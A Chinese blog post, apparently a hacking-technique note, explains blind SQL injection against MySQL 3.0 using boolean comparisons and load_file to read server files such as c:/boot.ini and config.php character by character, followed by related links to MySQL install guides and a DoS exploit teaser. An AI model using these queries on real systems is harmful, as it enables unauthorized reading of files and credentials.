关于mysql 3.0的注射的一点思路

mysql 3.0的注射

对mysql的注射主要是靠union 的联合查询,但union只对版本4。0以上的有用,对3。0以下的就没用了。。。。。。。。。。

所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file

但是也不可以直接使用union替换出来。 下面就是我的一点思路:

得到版本:

mysql> select * from user where userid=1 and length(version())<10;

Empty set (0.00 sec)

mysql> select * from user where userid=1 and length(version())<1777;

+--------+----------+----------+

| userid | username | password |

+--------+----------+----------+

| 1 | angel | mypass |

+--------+----------+----------+

1 row in set (0.00 sec)

得到当前数据库:

mysql> select * from user where userid=1 and length(database())>0;

+--------+----------+----------+

| userid | username | password |

+--------+----------+----------+

| 1 | angel | mypass |

+--------+----------+----------+

1 row in set (0.00 sec)

暴取文件代码:

mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))<1;

Empty set (0.05 sec)

mysql> select * from user where userid=1 and ascii(mid(load_file('c:/boot.ini'),1,1))>1;

+--------+----------+----------+

| userid | username | password |

+--------+----------+----------+

| 1 | angel | mypass |

+--------+----------+----------+

1 row in set (0.00 sec)

因为工作量大,可以用程序来实现(不过也很麻烦)

另外思路: 可以先使用字符处理函数得到"特殊字符的位置",如我们暴的是config.php文件我们就可以选取"localhost"(或其他)为特殊字符,先得到所在的位置(在哪个字节),在去猜它附近的,这样可以省去不少工作量。

(0)

相关推荐

  • 关于mysql 3.0的注射的一点思路

    mysql 3.0的注射 对mysql的注射主要是靠union 的联合查询,但union只对版本4.0以上的有用,对3.0以下的就没用了.......... 所以在mysql 3.0的数据库里没办法使用union进行跨表查询,但可以使用load_file 但是也不可以直接使用union替换出来. 下面就是我的一点思路: 得到版本: mysql> select * from user where userid=1 and length(version())<10; Empty set (0.00

  • win10下mysql 8.0.11压缩版安装详细教程

    最近重装电脑后,本着只装最新版本的强迫症原则,下载了mysql8.0.11解压版. 但是在网上找的各种安装教程五花八门,没有一个能安装成功的,是真的醉了,这里写下我自己安装成功的方法给大家分享. 一.环境变量配置 首先在官网下载最新的mysql8.0.11数据库,解压到你需要放置的盘符最好不要有中文,然后新建MYSQL_HOME 参数为mysql解压后安装文件的bin文件路径如我的: 变量名:MYSQL_HOME 变量值:E:\tools\database\mysql\mysql8.0.11\m

  • MySql 8.0.11 安装过程及 Navicat 链接时遇到的问题小结

    我的系统和软件版本是这样的: 系统环境:win7.64位 MySQL版本:8.0.11 对版本的说明 之所以说是 MySQL5.7 及以上版本,是因为从 MySQL5.7 版本之后,其安全机制有所改变.在安装完成后,登陆 MySQL 时,需要输入一个密码,这个密码其实是在配置 MySQL 的过程中生成的一个随机密码,而我们必须找到这个随机密码才能登陆 MySQL.而在 5.7 之前的版本并不需要这样做,因此对于 5.7 之前的版本,本教程可能并不完全适用,不过网上有很多,如果需要可以自己搜索.

  • mysql 8.0.17 安装配置方法图文教程

    本文为大家分享了mysql 8.0.17 安装配置方法,供大家参考,具体内容如下 安装程序下载: 首先是登录MySQL的官网,下载MySQL 8.0.17的安装包.官网地址:https://www.mysql.com/ 打开MySQL官网后,在出现的页面上,点击DOWNLOADS按钮: 在跳出的页面中,再点击Community,如下图所示: 接下来,我们来到 MySQL Community下载页面,我们找到MySQL Community Server,并点击下载按钮,如下图所示: 点击完DOWN

  • MySQL 8.0.31中使用MySQL Workbench提示配置文件错误信息解决方案

    MySQL 8.0.31中使用MySQL Workbench提示配置文件错误信息 Error opening configuration file UnicodeDecodeError:‘gbk’ coded can’t decode byte 0x92 in position 5004: illegal multibyte sequence 配置文件之前安装MySQL Server的时候编码格式好像改了, 才使的MySQL Workbench能打开配置文件;过完年回来发现还是会报错,这个报错看

  • mysql 5.0.67最新版替代MySQL 5.0.51b版本官方下载

    功能新增或变更的:  安全增强:使严格控制的位置,从哪个用户定义的函数可以被载入, plugin_dir系统变量已的 backported从MySQL 5.1 .如果该值非空,用户定义函数对象的文件可以被加载,只有从目录中命名这个 变量.如果该值是空的,行为是用来前5.0.67适用于: UDF的对象文件必须设在一个目录是搜查你的系统 的动态链接. (错误# 37428 )  重要的变化:不兼容的变化: FEDERATED存储引擎是现在默认情况下禁用在. cnf文件发运与MySQL分布 (我- h

  • MySQL 4.0 升级到mysql 5.0的方法

    一.从 4.0 到 4.1 的主要变化 如果在4.1.0到4.1.3版本的MySQL中创建了包含 TIMESTAMP 字段的 InnoDB表.则在升级到4.1.4及更高时需要重建表,因为存储格式发生变化了 字符串根据标准SQL来比较:比较之前不删除末尾的空格,以前用末尾空格扩展了比较短的字符串.现在的结果是'a' > 'a\t',以前则不这样.可以用 mysqlcheck 来检查一下数据表 TIMESTAMP 返回 'YYYY-MM-DD HH:MM:SS' 格式的字符串.在MySQL 4.0中

  • mysql 8.0 安装配置方法教程

    一.安装mysql yum源 从官网http://dev.mysql.com/downloads/repo/yum/下载mysql最新的yum源的rpm安装包 wget http://repo.mysql.com//mysql57-community-release-el6-9.noarch.rpm 使用yum安装rpm包 yum install mysql57-community-release-el6-9.noarch.rpm 检测mysql yum源 yum repolist enable

  • Centos6.4编译安装mysql 8.0.0 详细教程

    本文实例为大家分享了Centos6.4编译mysql  8.0.0 安装配置方法,供大家参考,具体内容如下 操作系统说明:CentOS 6.4 数据库版本:MySQL 8.0.0 一.环境准备 yum install ncurses-devel -y yum install libaio -y yum install glibc-devel.i686 glibc-devel -y yum install gcc gcc-c++ -y 另外,MySQL8.0需要用gcc的版本为 4.8以上,而ce

  • mysql 5.0.45 (修改)拒绝服务漏洞

    mysql 5.0.45 (修改)拒绝服务漏洞 /* * MySQL <=6.0 possibly affected * Kristian Erik Hermansen * Credit: Joe Gallo * You must have Alter permissions to exploit this bug! * Scenario: You found SQL injection, but you want to punch backend server * in the nuts ju

随机推荐